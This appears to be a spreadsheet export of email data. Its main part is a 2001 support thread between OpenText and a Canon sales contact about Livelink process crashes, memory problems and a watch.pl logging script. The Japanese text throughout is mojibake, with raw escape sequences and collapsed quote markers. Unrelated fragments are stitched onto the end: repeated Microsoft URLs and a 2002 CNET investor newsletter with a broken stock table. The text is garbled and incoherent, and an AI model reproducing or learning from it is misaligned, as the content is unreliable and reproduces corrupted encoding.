&gt; &gt; &gt; &gt; &gt; &gt; &gt; watch.log_x001B_$B$K$O!"F|;~$,=PNO$5$l$J$$$N$G$$$D$NCM$+$o$+$j$^$;$s$,_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B:G=i$NCM$H:G8e$NCM$rHf3S$9$k$H_x001B_(BFaults_x001B_$B9`L\$,A}$($F$$$k0J30$O!"_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BJQ2=$,$J$$$h$&amp;$K;W$o$l$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%W%m%;%9%@%&amp;%s$N860x$K$D$$$F$h$m$7$/$*4j$$$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#!!@55A_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message -------- &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt;   - ticket #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; &gt; Date: Tue, 11 Sep 2001 13:31:52 -0400 &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;, &gt; &gt; &gt; &gt; &gt; &gt; &lt;&gt;,&lt;&gt;, &gt; &gt; &gt; &gt; &gt; &gt;  &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#MM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001B_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B3NG'$r &gt; _x001B_$B$o$;_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$F8+_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$F!"_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%a%b%j$N;HMQ&gt;u67$rD4::$9$k$h$&amp;$G$9!#2a5n$N;vNc$^$G$O$o$+$j$^_x001B_(B &gt; &gt; _x001B_$B$;$s_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$G$7_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$?$,_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B2?EY$+KLJF$N$*5RMM$KBP$7$F;HMQ$5$l$?$3$H$,$"$k$h$&amp;$G$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$h$m$7$/$*4j$$$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message----- &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:] &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Tuesday, September 11, 2001 4:19 AM &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ; &gt; &gt; &gt; &gt; ; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: Re: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$_x001B_(B &gt; &gt; _x001B_$B$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt;  - ticket &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KElMM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; perl_x001B_$B$r%$%s%9%H!&lt;%k$7!"J@ &gt; _x001B_$B$rE:_x001B_(B &gt; &gt; &gt; &gt; _x001B_$BIU$7_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$^$9_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B!#$3$N%U%!%$%k$G$h$m$7$$$G$7$g$&amp;$+!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$h$1$l$P!";0I)2=3XMM$K@_Dj$7%W%m%;%9%@%&amp;%s$^$G%m%0$r=PNO$9_x001B_(B &gt; &gt; _x001B_$B$k@__x001B_(B &gt; &gt; &gt; &gt; _x001B_$BDj$K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$7$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$$$?$@$-$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$J$*!"$3$N%m%0$K$O!";~9o$,=PNO$5$l$k$h$&amp;$K$J$C$F$$$^$;$s$,_x001B_(B &gt; &gt; _x001B_$B!"%W_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B%m%;_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%9%@_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%&amp;%s$H$N4X78$,$o$+$k$N$G$7$g$&amp;$+!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%m%0FbMF$N@bL@$H!"2a5n$K$3$N%m%0$+$i$o$+$C$?;vNc$r$4O"Mm$/_x001B_(B &gt; &gt; _x001B_$B$@$5_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$$!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$h$m$7$/$*4j$$$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#!!@55A_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -------- Original Message -------- &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$_x001B_(B &gt; &gt; _x001B_$B$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  - ticket #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Date: Mon, 10 Sep 2001 15:44:26 -0400 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: "Hitoshi Ito" &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Reply-To: &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: "'it-oh'" &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; CC: &lt;&gt;, &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &lt;&gt;,&lt;&gt;, &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  &lt;&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#MM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001B_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B3+H/$+$i$NJV;v$,$"$j$^$7$?$N$G$*CN$i$;$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; They seem to have quite a few crashes when the &gt; &gt; &gt; &gt; system seem to &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; be allocating &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; a pointer and then jumping off into the oblivion. &gt; &gt; &gt; &gt; I'd say we &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; should get &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; them watch.pl to see if they're running out of &gt; &gt; memory.  The &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; crashes are all &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; over the map but all of them seem to relate &gt; &gt; back to being &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; unable to trying &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; to get memory or to having an invalid pointer &gt; &gt; of some sort. &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$H$$$&amp;$3$H$G!"%a%b%jITB-$J$I$,860x$H$J$C$F%W%m%;%9%@%&amp;%s$,_x001B_(B &gt; &gt; _x001B_$B5/$3_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$C$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$$$k_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$N$G$O$J$$$+$H9M$($F$$$k$h$&amp;$G$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BE:IU$N_x001B_(BZIP_x001B_$B%U%!%$%k$r$4;2&gt;H2&lt;$5$$!#@bL@$N_x001B_(BWord_x001B_$B%I%-%e%a%s%H$,$"_x001B_(B &gt; &gt; _x001B_$B$j$^_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$9$,_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B!"_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$3$3$G8@5Z$5$l$F$$$k_x001B_(Btest.pl_x001B_$B%9%/%j%W%H$O!"$b$&amp;;HMQ$5$l$F$$$J_x001B_(B &gt; &gt; _x001B_$B$$$H_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$$$&amp;_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$3$H_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$G$9!#;d$N_x001B_(BWin2k_x001B_$B4D6-$G$O!"JQ$o$j$K_x001B_(Bwatchpslist.pl_x001B_$B%9%/%j%W%H$r_x001B_(B &gt; &gt; _x001B_$B;HMQ_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$7_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BF0:n$r3NG'$$$?$7$^$7$?!#$43NG'2&lt;$5$$!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$3$N%9%/%j%W%H$r;HMQ$7!";0I)2=3XMM$N%5%$%H$G%m%0$r &gt; &gt; &gt; thread_x001B_$B%m_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%0_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$H_x001B_(Bwatch.log_x001B_$B$r$3$A$i$^$G$*Aw$j2&lt;$5$$!#$h$m$7$/$*4j$$CW$7$^$9_x001B_(B &gt; &gt; _x001B_$B!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message----- &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: Hitoshi Ito [mailto:] &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, September 07, 2001 4:38 PM &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: 'it-oh' &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ''; &gt; &gt; &gt; &gt; &gt; &gt; ''; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ''; '' &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: RE: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D_x001B_(B &gt; &gt; _x001B_$B$$$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;  - ticket &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; #53121OTC1 - &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#MM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OpenText_x001B_$B$N0KEl$G$9!#$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$3$N7o$K4X$7$^$7$F%^%M!&lt;%8%c!&lt;$^$GJs9p$7!";0I)EE5!MM$N;~_x001B_(B &gt; &gt; _x001B_$B$N$h_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$&amp;$K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%7%+%4$N3+H/$N$[$&amp;$X%m%0$rAw$jD4::$5$;$k$3$H$K$J$j$^$7$?_x001B_(B &gt; &gt; _x001B_$B!#2?_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$+$o_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$+$j_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$h$m$7$/$*4j$$CW$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; -----Original Message----- &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; From: it-oh [mailto:] &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Sent: Friday, September 07, 2001 4:34 AM &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; To: &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Cc: ; &gt; &gt; &gt; &gt; &gt; &gt; ; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; ; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Subject: _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM%W%m%;%9%@%&amp;%s$K$D$$_x001B_(B &gt; &gt; _x001B_$B$F_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; OTC/_x001B_$B0KElMM_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$*@$OC$K$J$C$F$*$j$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B;0I)2=3X%(%s%8%K%"%j%s%0MM_x001B_(B(NT_x001B_$B%f!&lt;%6_x001B_(B)_x001B_$B$K$F%W%m%;%9%@%&amp;%s_x001B_(B &gt; &gt; _x001B_$B$,B?_x001B_(B &gt; &gt; &gt; &gt; _x001B_$BH/$7_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$F$$_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$^_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$9_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B#67n#2#6F|$+$i#87n#1#0F|$^$G$N%m%0$,0lEY$KAw$i$l$F$-$^_x001B_(B &gt; &gt; _x001B_$B$7$?_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Solaris_x001B_$B4D_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B6-_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$N;0I)EE5!MM$h$j%W%m%;%9%@%&amp;%s$NIQEY$,9b$$$G$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%m%0$O!"_x001B_(Bftp_x001B_$B%5%$%H!V!W%f!&lt;%6$N!V_x001B_(Bmitsubishi &gt; &gt; cemical eng_x001B_$B!W_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B%U%)_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%k%@_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BFb_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%"%C%W$7$^$7$?!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BESCf$G=*N;$7$F$$$k_x001B_(Bthread_x001B_$B%m%0$N:G=*=hM}$O!"$5$^$6$^$J%Q_x001B_(B &gt; &gt; _x001B_$B%?!&lt;_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B%s$,_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$"$j_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Livelink_x001B_$B$N=hM}$r:FEY9T$J$C$F$b%W%m%;%9%@%&amp;%s$K$J$k$3$H_x001B_(B &gt; &gt; _x001B_$B$O$J_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$/_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BESCf$G=*N;$7$F$$$k=hM}$,860x$G%W%m%;%9%@%&amp;%s$K$J$C$F$$_x001B_(B &gt; &gt; _x001B_$B$k$3_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$H$O_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$J$$_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$H_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B;W_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$$$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$*Aw$j$9$k%m%0$+$i%W%m%;%9%@%&amp;%s$N860x$H2r7hJ}K!$K$D$$_x001B_(B &gt; &gt; _x001B_$B$F$*_x001B_(B &gt; &gt; &gt; &gt; _x001B_$BCN$i_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$;$/_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$@_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$5_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$$!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$3$l$@$1$N%m%0$r3NG'$9$k$K$O!";~4V$,$+$+$j$^$9$N$G:G?7_x001B_(B &gt; &gt; (_x001B_$B#87n_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B#1#0_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$BF|_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; )_x001B_$B$N_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%m_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%0$+$i3NG'$r$*4j$$$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$J$*!";0I)2=3X%(%s%8%K%"%j%s%0MM$G$O!"%A%'%s%8%(!&lt;%8%'_x001B_(B &gt; &gt; _x001B_$B%s%H_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B=hM}_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$rJL_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; Livelink_x001B_$B%5!&lt;%P$KJL$1$F$*$j$^$;$s!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%W%m%;%9%@%&amp;%sH/@8F|;~_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010626 03:00 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010626 09:56 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010627 13:17  - connect_x001B_$B%m%0$,Bg$-$$$?$a!"_x001B_(Bconnect_x001B_$B%m%0_x001B_(B &gt; &gt; _x001B_$B0J30_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$r_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; ftp_x001B_$B%5%$_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%H_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%"%C%W$7$^$7$?!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010708 22:09 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010710 04:00 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010710 08:05 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010718 09:10 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010718 09:28 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010725 10:50 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010731 08:26 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010807 11:00  - connect_x001B_$B%m%0$,Bg$-$$$?$a!"_x001B_(Bconnect_x001B_$B%m%0_x001B_(B &gt; &gt; _x001B_$B0J30_x001B_(B &gt; &gt; &gt; &gt; _x001B_$B$r_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; ftp_x001B_$B%5%$_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%H_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%"%C%W$7$^$7$?!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010809 09:01 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; 20010810 08:57 &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B$h$m$7$/$*4j$$$$$?$7$^$9!#_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B%-%d%N%sHNGd!J3t!K_x001B_(B &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; _x001B_$B0KF#!!@55A_x001B_(B</t>
  </si>
  <si>
    <t>http://www.microsoft.com http://www.microsoft.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: "CNET News.com Investor" &lt;Online#3.19846.2a-726zgP3UI7kTO9RR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 16:21:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 16:21:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Investor" &lt;Online#3.19846.2a-726zgP3UI7kTO9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>NEWS.COM INVESTOR: Battered stocks regain ground</t>
  </si>
  <si>
    <t>\n\n![CNET Investor Dispatch]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n|  |  **Quote Lookup**  \nEnter symbol:  \n  \n* Symbol Lookup  \nQuotes delayed 20+ minutes  \n---  \n  \n![Investor Sections]([URL]http://www.cnet.com[/URL]  \nÂ• **My Portfolio**  \nÂ• **Broker Reports**  \nÂ• **IPOs**  \nÂ• **Splits**  \nÂ• **Messages**\n\n![Tech Winners]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | MRAE | 3.9 | 27.87%  \n---|---|---|---  \n![]([URL]http://home.cnet.com[/URL]  | LEXG | 5.15 | 27.16%  \n![]([URL]http://home.cnet.com[/URL]  | BNHNA | 14.95 |\n24.63%  \n![]([URL]http://home.cnet.com[/URL]  | AETH | 3.48 | 22.97%  \n![]([URL]http://home.cnet.com[/URL]  | GGUY | 3.1 | 21.57%  \n  \n![Tech Losers]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  | GDYS | 6.951 |\n-32.78%  